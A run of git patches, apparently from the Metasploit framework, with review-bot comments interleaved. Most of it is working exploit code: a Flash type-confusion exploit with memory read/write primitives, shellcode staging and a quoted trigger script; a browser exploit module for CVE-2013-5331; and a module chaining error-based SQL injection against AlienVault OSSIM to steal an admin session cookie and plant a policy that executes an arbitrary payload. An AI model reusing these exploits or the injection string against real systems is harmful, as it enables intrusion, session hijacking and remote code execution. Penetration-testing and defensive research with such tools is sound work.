/ 4]; + } + return vector[0x40000000 - (vector_address - address) / 4]; + } + + // vector: tweaked vector with 0x40000001 length + // vector_address: address of tweaked vector + // address: address to write + // value: value to write + function writeMemoryAt(vector:Vector., vector_address:uint, address:uint, value:uint) : * { + if(address >= vector_address) + { + vector[(address - vector_address) / 4] = value; + } + else + { + vector[0x40000000 - (vector_address - address) / 4] = value; + } + } + + function getNinbets(vector:*, vector_address:*) : Array { + var _loc9_:uint = 0; + var array_related_addr:uint = this.getMemoryAt(vector,vector_address,(vector_address & 0xfffff000) + 0x1c); + var index_array_related_addr:uint = 0; + var _loc5_:uint = 0; + var _loc6_:uint = 0; + if(array_related_addr >= vector_address) + { + index_array_related_addr = (array_related_addr - vector_address) / 4; + } + else + { + index_array_related_addr = 0x40000000 - (vector_address - array_related_addr) / 4; + } + var _loc7_:uint = 0; + while(true) + { + index_array_related_addr--; + _loc9_ = vector[index_array_related_addr]; + if(_loc9_ == 0xfff870ff) + { + _loc7_ = 2; + break; + } + if(_loc9_ == 0xf870ff01) + { + _loc7_ = 1; + break; + } + if(_loc9_ == 0x70ff016a) + { + _loc9_ = vector[index_array_related_addr + 1]; + if(_loc9_ == 0xfc70fff8) + { + _loc7_ = 0; + break; + } + } + else + { + if(_loc9_ == 0x70fff870) + { + _loc7_ = 3; + break; + } + } + } + + _loc5_ = vector_address + 4 * index_array_related_addr - _loc7_; + index_array_related_addr--; + var _loc8_:uint = vector[index_array_related_addr]; + if(_loc8_ == 0x16a0424) + { + return [_loc5_,_loc6_]; + } + if(_loc8_ == 0x6a042444) + { + return [_loc5_,_loc6_]; + } + if(_loc8_ == 0x424448b) + { + return [_loc5_,_loc6_]; + } + if(_loc8_ == 0xff016a04) + { + return [_loc5_,_loc6_]; + } + + _loc6_ = _loc5_ - 6; + while(true) + { + index_array_related_addr--; + _loc9_ = vector[index_array_related_addr]; + if(_loc9_ == 0x850ff50) + { 
+ if(uint(vector[index_array_related_addr + 1]) == 0x5e0cc483) + { + _loc7_ = 0; + break; + } + } + _loc9_ = _loc9_ & 0xffffff00; + if(_loc9_ == 0x50ff5000) + { + if(uint(vector[index_array_related_addr + 1]) == 0xcc48308) + { + _loc7_ = 1; + break; + } + } + _loc9_ = _loc9_ & 0xffff0000; + if(_loc9_ == 0xff500000) + { + if(uint(vector[index_array_related_addr + 1]) == 0xc4830850) + { + if(uint(vector[index_array_related_addr + 2]) == 0xc35d5e0c) + { + _loc7_ = 2; + break; + } + } + } + _loc9_ = _loc9_ & 0xff000000; + if(_loc9_ == 0x50000000) + { + if(uint(vector[index_array_related_addr + 1]) == 0x830850ff) + { + if(uint(vector[index_array_related_addr + 2]) == 0x5d5e0cc4) + { + _loc7_ = 3; + break; + } + } + } + } + + _loc5_ = vector_address + 4 * index_array_related_addr + _loc7_; + return [_loc5_,_loc6_]; + } + + // vector: tweaked vector with 0x40000001 length + // address: address of tweaked vector + function getFileReferenceLocation(vector:*, address:*) : uint { + var flash_address:uint = this.getMemoryAt(vector,address,(address & 0xfffff000) + 28); + var _loc4_:uint = 0; + while(true) + { + _loc4_ = this.getMemoryAt(vector,address,flash_address + 8); + if(_loc4_ == 0x2a0) + { + break; + } + if(_loc4_ < 0x2a0) + { + flash_address = flash_address + 36; + } + else + { + flash_address = flash_address - 36; + } + } + + var file_ref_related_addr:uint = this.getMemoryAt(vector,address,flash_address + 12); + while(this.getMemoryAt(vector,address, file_ref_related_addr + 384) != 0xffffffff) + { + if(this.getMemoryAt(vector,address, file_ref_related_addr + 380) == 0xffffffff) + { + break; + } + file_ref_related_addr = this.getMemoryAt(vector, address, file_ref_related_addr + 8); + } + return file_ref_related_addr; + } + + function getCodeAddress(vector:*, vector_addr:*, mark:*) : uint { + var vector_length_read:uint = 0; + var vector_code_info_addr:uint = this.getMemoryAt(vector, vector_addr,(vector_addr & 0xfffff000) + 0x1c); + while(true) + { + vector_length_read = 
this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 8); + if(vector_length_read == 2032) // code vector length + { + break; + } + vector_code_info_addr = vector_code_info_addr + 0x24; + } + + var vector_code_contents_addr:uint = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 0xc); + while(this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 0x28) != mark) + { + vector_code_contents_addr = this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 8); + } + return vector_code_contents_addr + 0x2c; // Code address, starting at nops after the mark + } + + // Every vector in the array => 7f0 (header = 8; data => 0x7e8) + function createCodeVectors(mark:uint, nops:uint) : * { + var array:Array = new Array(); + var i:* = 0; + while(i < 8) + { + array[i] = new Vector.(2032 / 4 - 8); + array[i][0] = mark; + array[i][1] = nops; + i++; + } + return array; + } + + function fillCodeVectors(param1:Array, param2:uint) : * { + var i:uint = 0; + var sh:uint=1; + + while(i < param1.length) + { + for(var u:String in shellcodeObj) + { + param1[i][sh++] = Number(shellcodeObj[u]); + } + i++; + sh = 1; + } + } + + } +} + +// Trigger's ActionScript + +/* + +// Action script... 
+ +// [Action in Frame 1] +var b = new flash.display.BitmapData(4, 7); +var filt = new flash.filters.DisplacementMapFilter(b, new flash.geom.Point(1, 2), 1, 2, 3, 4); +var b2 = new flash.display.BitmapData(256, 512); +var filt2 = new flash.filters.DisplacementMapFilter(b2, new flash.geom.Point(1, 2), 1, 2, 3, 4); +var colors = [16777215, 16711680, 16776960, 52479]; +var alphas = [0, 1, 1, 1]; +var ratios = [0, 63, 126, 255]; +var ggf = new flash.filters.GradientGlowFilter(0, 45, colors, alphas, ratios, 55, 55, 2.500000, 2, "outer", false); +var cmf = new flash.filters.ColorMatrixFilter([]); +MyString2.setCMF(cmf); +MyString1.setGGF(ggf); +flash.filters.ColorMatrixFilter.prototype.resetMe = _global.ASnative(2106, 302); +zz = MyString1; +flash.display.BitmapData = zz; +arr = new Array(); +var i = 0; +while (i < 8192) +{ + arr[i] = new Number(0); + ++i; +} // end while +var i = 100; +while (i < 8192) +{ + arr[i] = "qwerty"; + i = i + 8; +} // end while +k = filt.mapBitmap; +zz = MyString2; +flash.display.BitmapData = zz; +k = filt.mapBitmap; +cmf_matrix = cmf.matrix; +cmf_matrix[4] = 8192; +cmf_matrix[15] = 12.080810; +cmf.matrix = cmf_matrix; +ggf_colors = ggf.colors; +ggf_alphas = ggf.alphas; +mem = new Array(); +var i = 0; +while (i < ggf_alphas.length) +{ + ggf_alphas[i] = ggf_alphas[i] * 255; + ++i; +} // end while +for (i = 0; i < ggf_colors.length; i++) +{ + mem[i] = ggf_colors[i] + ggf_alphas[i] * 16777216; +} // end of for +ggf.colors = colors; +ggf.alphas = alphas; +ggf.ratios = ratios; +var lc = new LocalConnection(); +lc.send("toAS3", "as2loaded", mem); +zz = cmf; +zz.resetMe("b", 1, 1, 1); + + +class MyString1 extends String +{ + static var ggf; + function MyString(a,b) + { + super(); + } + + static function setGGF(myggf) + { + ggf = myggf; + } + + static function getGGF() + { + return (MyString1.ggf); + } +} + +class MyString2 extends String +{ + static var cmf; + function MyString2(a,b) + { + super(); + } + + static function setCMF(mycmf) + { + cmf = 
mycmf; + } + + static function getCMF() + { + return (MyString2.cmf); + } +} + + +*/ diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb new file mode 100644 index 0000000000..7e08ea356e --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb 
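Review bot: The `trigger_swf` string and the `key` field are declared without a comment describing the encoding that the constructor later undoes (hex text turned into bytes by `createByteArray`, then `uncompress()`, then a 32-bit XOR with `key`), so a reader or analyst cannot tell from the declaration that the embedded trigger is not visible to a plain scan of the outer file. I would document it beside the field, e.g. `// trigger_swf: hex of zlib-compressed bytes, each 32-bit word XORed with key; decoded in Exploit() and handed to Loader.loadBytes`, and record how the blob was built from the ActionScript 2 source quoted at the end of the file. The hunk also keeps decompiler names (`param1`, `_loc15_`, `_loc9_`, `_loc5_`) and writes `key` as the float literal `3.627461843E9` for a `uint`; descriptive names and a hex literal would make the file reviewable. The `Vector.(…)` expressions appear to have lost their type parameter in this rendering of the patch, so that is probably not in the committed file.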
@@ -0,0 +1,131 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Flash Player Type Confusion Remote Code Execution", + 'Description' => %q{ + This module exploits a type confusion vulnerability found in the ActiveX + component of Adobe Flash Player. This vulnerability was found exploited + in the wild in November 2013. This module has been tested successfully + on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170 + over Windows XP SP3 and Windows 7 SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit int he wild + 'bannedit', # Exploit in the wild discovery, analysis and reporting + 'juan vazquez' # msf module + ], + 'References' => + [ + [ 'CVE', '2013-5331' ], + [ 'OSVDB', '100774'], + [ 'BID', '64199'], + [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb13-28.html' ], + [ 'URL', 'http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html' ] + ], + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true, + 'PrependEncoder' => stack_adjust + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false, + 'EXITFUNC' => "thread" + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + :method => "LoadMovie", + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^11\.[7|8|9]/ && ver < '11.9.900.170' } + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 10 2013", + 'DefaultTarget' => 0)) + end + + def exploit + @swf = 
create_swf + super + end + + def stack_adjust + adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb + adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit + adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit + adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset + + adjust + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + return + end + + print_status("Sending HTML...") + tag = retrieve_tag(cli, request) + profile = get_profile(tag) + profile[:tried] = false unless profile.nil? # to allow request the swf + print_status("showme the money") + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + flash_payload = "" + get_payload(cli,target_info).unpack("V*").each do |i| + flash_payload << "0x#{i.to_s(16)}," + end + flash_payload.gsub!(/,$/, "") + + + html_template = %Q| + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-5331", "Exploit.swf" ) + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end From 0bca3a2d54aaa63cd798cc41b4f4d97f00951708 Mon Sep 17 00:00:00 2001 
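Review bot: `on_request_exploit` still emits a leftover debug line, `print_status("showme the money")`, on every HTML request; it should be removed or replaced by a message that says what is being served. In `create_swf` the block assigns `swf` inside the expression that is itself assigned to `swf` (`swf = ::File.open(path, 'rb') { |f| swf = f.read }`); `::File.binread(path)` reads the same bytes without the double assignment. The header comment's URL is written `http//metasploit.com/download` without the colon, and in `stack_adjust` the comment `mov eax, fs:[0x18` is missing its closing bracket.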
From: nstarke Date: Sun, 27 Apr 2014 20:31:32 +0000 Subject: [PATCH 169/853] POST module duplicate search results MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Running a POST module in meterpreter was causing duplicate search results for the executed module. For example, running post/windows/gather/checkvm would produce duplicate results for that module when executing “search checkvm” in msf. Debugging revealed that the cmd_exec function in meterpreter’s ui command_dispatcher core was creating the specified module, and then promptly reloading it. The reload function was causing the duplicate module_detail record to be written to the msg postgres database instance. Further analysis revealed that the “original_mod” could be used for running the post module, so the “reloaded_mod” was removed and the “original_mod” used in it’s place to run the post module. SeeRM #8754 --- .../post/meterpreter/ui/console/command_dispatcher/core.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 6766ce7e7f..b0d16da36d 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -542,9 +542,8 @@ class Console::CommandDispatcher::Core # fall back to using the scripting interface. if (msf_loaded? and mod = client.framework.modules.create(script_name)) original_mod = mod - reloaded_mod = client.framework.modules.reload_module(original_mod) - unless reloaded_mod + unless original_mod error = client.framework.modules.module_load_error_by_path[original_mod.file_path] print_error("Failed to reload module: #{error}") 
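Review bot: The new `unless original_mod` guard can never fire, because this branch is entered only when `mod = client.framework.modules.create(script_name)` was truthy and `original_mod` is that same object. With the `reload_module` call removed, the guard and its `print_error("Failed to reload module: #{error}")` message are dead code that still describes a reload, so I would delete the guard together with the message. The `original_mod = mod` alias then has no remaining purpose, and the second hunk could call `mod.run_simple(` directly. The method body starts and ends outside both hunks, so whether later code relies on `original_mod` is not visible here.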
@@ -552,7 +551,7 @@ class Console::CommandDispatcher::Core end opts = (args + [ "SESSION=#{client.sid}" ]).join(',') - reloaded_mod.run_simple( + original_mod.run_simple( #'RunAsJob' => true, 'LocalInput' => shell.input, 'LocalOutput' => shell.output, From 9ce5545034f944c9b10e1a8adab75129a475b019 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 27 Apr 2014 20:13:46 -0500 Subject: [PATCH 170/853] Fix comments --- .../windows/browser/adobe_flash_filters_type_confusion.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb index 7e08ea356e..ff8a3f4549 100644 --- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb @@ -23,8 +23,8 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Unknown', # Vulnerability discovery and exploit int he wild - 'bannedit', # Exploit in the wild discovery, analysis and reporting + 'Unknown', # Vulnerability discovery and exploit in the wild + 'bannedit', # Exploit in the wild discoverer, analysis and reporting 'juan vazquez' # msf module ], 'References' => From 2e04bc9e4e6d6e4bba32de9af0dc72c443f1c769 Mon Sep 17 00:00:00 2001 From: xistence Date: Mon, 28 Apr 2014 10:59:15 +0700 Subject: [PATCH 171/853] AlienVault OSSIM 4.3.1 unauthenticated SQLi RCE --- .../unix/webapp/alienvault_sqli_exec.rb | 334 ++++++++++++++++++ 1 file changed, 334 insertions(+) create mode 100644 modules/exploits/unix/webapp/alienvault_sqli_exec.rb diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb new file mode 100644 index 0000000000..8c7653c8a5 --- /dev/null +++ b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb 
@@ -0,0 +1,334 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "AlienVault OSSIM SQL Injection and Remote Code Execution", + 'Description' => %q{ + This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault + OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an + active admin session ID. If an administrator level user is identified, remote code execution + can be gained by creating a high priority policy with an action containing our payload. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Sasha Zivojinovic', # SQLi discovery + 'xistence ' # Metasploit module + ], + 'References' => + [ + ], + 'DefaultOptions' => + { + 'SSL' => true + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'RequiredCmd' => 'generic perl ruby python bash', + } + }, + 'Targets' => + [ + ['Alienvault OSSIM', {}] + ], + 'Privileged' => true, + 'DisclosureDate' => "Apr 28 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(443), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']) + ], self.class) + end + + + def check + # Check version + vprint_status("#{peer} - Trying to detect vulnerable OSSIM") + + marker = rand_text_alpha(6) + sqlirand = rand_text_numeric(4+rand(4)) + sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) " + sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" + + res = send_request_cgi({ + 'uri' => 
normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), + 'vars_get' => { 'date_from' => sqli } + }) + + if res and res.code == 200 and res.body =~ /#{marker}726F6F74403132372E302E302E31#{marker}/ # 726F6F74403132372E302E302E31 = root@127.0.0.1 + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + + end + + + def exploit + marker = rand_text_alpha(6) + sqlirand = rand_text_numeric(4+rand(4)) + sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " + sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqlirand}'='#{sqlirand}" + + print_status("#{peer} - Trying to grab admin session through SQLi") + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), + 'vars_get' => { 'date_from' => sqli } + }) + + if res and res.code == 200 and res.body =~ /#{marker}(.*)#{marker}/ + adminsession = $1 + @cookie = "PHPSESSID=" + ["#{adminsession}"].pack("H*") + print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") + else + fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") + end + + # Creating an Action containing our payload, which will be executed by any event (not only alarms) + action = rand_text_alpha(8+(rand(8))) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "action", "modifyactions.php"), + 'cookie' => @cookie, + 'vars_post' => { + 'action' => 'new', + 'action_name' => action, + 'descr' => action, + 'action_type' => '2', + 'only' => 'on', + 'cond' => 'True', + 'exec_command' => payload.encoded + } + }) + + if res and res.code == 200 + print_status("#{peer} - Created Action [ #{action} ]") + else + fail_with(Failure::Unknown, "#{peer} - Action creation failed!") + end + + # Retrieving the Action ID, used to clean up the 
action after succesful exploitation + post_vars = "page=1&rp=2000" + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"), + 'cookie' => @cookie, + 'data' => post_vars + }) + + if res and res.code == 200 and res.body =~ /actionform.php\?id=(.*)'>#{action}/ + @actionid = $1 + print_status("#{peer} - Action ID is [ #{@actionid} ]") + else + fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") + end + + # Retrieving the policy data, necessary for proper cleanup after succesful exploitation + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "policy.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'm_opt' => 'configuration', + 'sm_opt' => 'threat_intelligence', + 'h_opt' => 'policy' + } + }) + + if res and res.code == 200 and res.body =~ /getpolicy.php\?ctx=(.*)\&group=(.*)',/ + policyctx = $1 + policygroup = $2 + print_status("#{peer} - Policy data [ ctx=#{policyctx} ] and [ group=#{policygroup} ] retrieved!") + else + fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") + end + + # Creating policy which will be triggered by any source/destination + policy = rand_text_alpha(8+(rand(8))) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"), + 'cookie' => @cookie, + 'vars_post' => { + 'descr' => policy, + 'active' => '1', + 'group' => policygroup, + 'ctx' => policyctx, + 'order' => '1', # Makes this the first policy, overruling all the other policies + 'action' => 'new', + 'sources[]' => '00000000000000000000000000000000', # Source is ANY + 'dests[]' => '00000000000000000000000000000000', # Destination is ANY + 'portsrc[]' => '0', # Any source port + 'portdst[]' => '0', # Any destination port + 'plug_type' => '0', # Any plugin type + 'plugins[0]' => 'on', + 'tax_pt' => '0', + 'tax_cat' => '0', + 'tax_subc' => '0', + 'mboxs[]' => 
'00000000000000000000000000000000', + 'rep_act' => '0', + 'rep_sev' => '1', + 'rep_rel' => '1', + 'rep_dir' => '0', + 'ev_sev' => '1', + 'ev_rel' => '1', + 'tzone' => 'Europe/Amsterdam', + 'date_type' => '1', + 'begin_hour' => '0', + 'begin_minute' => '0', + 'begin_day_week' => '1', + 'begin_day_month' => '1', + 'begin_month' => '1', + 'end_hour' => '23', + 'end_minute' => '59', + 'end_day_week' => '7', + 'end_day_month' => '31', + 'end_month' => '12', + 'actions[]' => @actionid, + 'sim' => '1', + 'priority' => '1', + 'qualify' => '1', + 'correlate' => '0', # Don't make any correlations + 'cross_correlate' => '0', # Don't make any correlations + 'store' => '0' # We don't want to store anything :) + } + }) + + if res and res.code == 200 + print_status("#{peer} - Created Policy [ #{policy} ]") + else + fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") + end + + # Retrieve policy ID, needed for proper cleanup after succesful exploitation + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'ctx' => policyctx, + 'group' => policygroup + }, + 'vars_post' => { + 'page' => '1', + 'rp' => '2000' + } + }) + if res and res.code == 200 and res.body =~ /row id='(.*)' col_order='1'/ + @policyid = $1 + print_status("#{peer} - Policy ID [ #{@policyid} ] retrieved!") + else + fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") + end + + # Reload the policies to make our new policy active + policy = rand_text_alpha(8) + print_status("#{peer} - Reloading Policies") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'what' => 'policies', + 'back' => '../policy/policy.php' + } + }) + + if res and res.code == 200 + print_status("#{peer} - Policies reloaded!") + else + fail_with(Failure::Unknown, "#{peer} - Policy reloading 
failed!") + end + + + # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. + dontexist = rand_text_alpha(8+rand(4)) + print_status("#{peer} - Triggering policy and action by requesting a non existing url") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, dontexist), + 'cookie' => @cookie + }) + + if res and res.code == 404 + print_status("#{peer} - Payload delivered") + else + fail_with(Failure::Unknown, "#{peer} - Payload failed!") + end + + end + + + def cleanup + # Clean up, retrieve token so that the policy can be removed + print_status("#{peer} - Cleaning up") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), + 'cookie' => @cookie, + 'vars_post' => { 'f_name' => 'delete_policy' } + }) + + if res and res.code == 200 and res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ + token = $1 + print_status("#{peer} - Token [ #{token} ] retrieved") + else + print_warning("#{peer} - Unable to retrieve token") + end + + # Remove our policy + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'confirm' => 'yes', + 'id' => @policyid, + 'token' => token + } + }) + + if res and res.code == 200 + token = $1 + print_status("#{peer} - Policy ID [ #{@policyid} ] removed") + else + print_warning("#{peer} - Unable to remove Policy ID") + end + + # Remove our action + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'id' => @actionid, + } + }) + + if res and res.code == 200 + token = $1 + print_status("#{peer} - Action ID [ #{@actionid} ] removed") + else + print_warning("#{peer} - Unable to remove Action ID") + end + + end + +end 
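Review bot: `cleanup` issues its delete requests unconditionally, so when `exploit` stopped early `@cookie`, `@policyid` or `@actionid` can still be nil (assuming the framework calls `cleanup` whenever the module finishes). When the token request fails it only warns and then calls deletepolicy.php with `'token' => nil`. A guard such as `return unless @cookie` at the top, plus `if @policyid && token` and `if @actionid` around the two deletes, would keep the "removed" and "Unable to remove" messages truthful; that matters because a leftover order-1 policy stays active on the assessed system. The two `token = $1` lines after the delete requests follow conditions with no regex match, so they assign a stale or nil `$1` and can be removed. In `check`, `sqlirand` is assigned but never used.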
From 328acc44faf8d999dcc533e809d4cb752f6587f9 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 11:32:46 +0200 Subject: [PATCH 172/853] Start cleaning as requested --- .../scanner/http/f5_bigip_cookie_disclosure.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index 9ac2c2e550..e7dac22d2b 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -14,10 +14,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'F5 Bigip Backend IP/PORT Cookie Disclosure.', 'Description' => %q{ - This module identify F5 BigIP SLB and decode sticky cookies wich leak + This module identify F5 BigIP SLB and decode sticky cookies which leak backend IP and port. }, - 'Author' => [ 'Thanat0s ' ], + 'Author' => [ 'Thanat0s ' ], 'References' => [ ['URL', 'http://support.f5.com/kb/en-us/solutions/public/6000/900/sol6917.html'], @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary return host,port end - def get_cook # request a page and exctract a F5 looking cookie. + def get_cookie # request a page and extract a F5 looking cookie. res = send_request_raw({ 'method' => 'GET', 'uri' => @uri @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary begin # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" m = res.headers['Set-Cookie'].match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) - ensure + ensure id = (m.nil?) ? nil : m[1] value = (m.nil?) ? nil : m[2] return id, value 
@@ -66,9 +66,9 @@ class Metasploit3 < Msf::Auxiliary host_port = Hash.new @uri = normalize_uri(target_uri.path) print_status("Starting request #{@uri}") - id, value = get_cook() + id, value = get_cookie() if id - print_status "F5 cookie \"#{id}\" found" + print_status ("F5 cookie \"#{id}\" found") host, port = cookie_decode(value) host_port[host+":"+port] = true print_status "Backend #{host}:#{port}" From d5fe8471ed02c72e6cd59e1f408006ba73b677af Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 12:16:49 +0200 Subject: [PATCH 173/853] unless id --- .../http/f5_bigip_cookie_disclosure.rb | 56 +++++++++---------- 1 file changed, 28 insertions(+), 28 deletions(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index e7dac22d2b..60d811b3b3 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'uri' => @uri }) - + begin # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" m = res.headers['Set-Cookie'].match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) - ensure + ensure id = (m.nil?) ? nil : m[1] value = (m.nil?) ? nil : m[2] return id, value 
@@ -67,33 +67,33 @@ class Metasploit3 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) print_status("Starting request #{@uri}") id, value = get_cookie() - if id - print_status ("F5 cookie \"#{id}\" found") - host, port = cookie_decode(value) - host_port[host+":"+port] = true - print_status "Backend #{host}:#{port}" - i=1 # We already have done one request - until i == datastore['RETRY'] - id, value = get_cook() - host, port = cookie_decode(value) - if ! host_port.has_key? host+":"+port - host_port[host+":"+port] = true - print_status "Backend #{host}:#{port}" - end - i += 1 - end - # Reporting found backend in database - backends = Array.new - host_port.each do |key, value| - backends.push key - end - report_note( - :host => datastore['RHOST'], - :type => "F5_Cookie_Backends", - :data => backends - ) - else + unless id print_error "F5 SLB cookie not found" + return end + print_status ("F5 cookie \"#{id}\" found") + host, port = cookie_decode(value) + host_port[host+":"+port] = true + print_status "Backend #{host}:#{port}" + i=1 # We already have done one request + until i == datastore['RETRY'] + id, value = get_cookie() + host, port = cookie_decode(value) + if ! host_port.has_key? host+":"+port + host_port[host+":"+port] = true + print_status "Backend #{host}:#{port}" + end + i += 1 + end + # Reporting found backend in database + backends = 